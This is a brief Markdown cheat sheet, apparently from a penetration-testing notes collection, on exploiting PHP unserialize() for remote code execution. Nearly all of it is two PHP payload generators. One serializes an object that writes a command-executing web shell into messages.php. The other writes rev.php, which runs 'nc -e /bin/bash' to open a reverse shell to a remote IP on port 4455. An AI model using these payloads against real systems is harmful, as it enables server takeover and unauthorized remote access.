30 lines
540 B
Markdown
30 lines
540 B
Markdown
|
# Unserialize
|
||
|
|
|
||
|
|
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
|
||
|
|
|
||
|
|
* Serialize via
|
||
|
|
```php
|
||
|
|
<?php
|
||
|
|
class FormSubmit {
|
||
|
|
public $form_file = 'messages.php';
|
||
|
|
public $message = '<?php
|
||
|
|
if(isset($_GET[\'cmd\']))
|
||
|
|
{
|
||
|
|
system($_GET[\'cmd\']);
|
||
|
|
}
|
||
|
|
?>';
|
||
|
|
}
|
||
|
|
|
||
|
|
print urlencode(serialize(new FormSubmit));
|
||
|
|
?>
|
||
|
|
```
|
||
|
|
|
||
|
|
```php
|
||
|
|
<?php class file
|
||
|
|
{
|
||
|
|
public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>';
|
||
|
|
}
|
||
|
|
echo (serialize(new file));
|
||
|
|
?>
|
||
|
|
```
|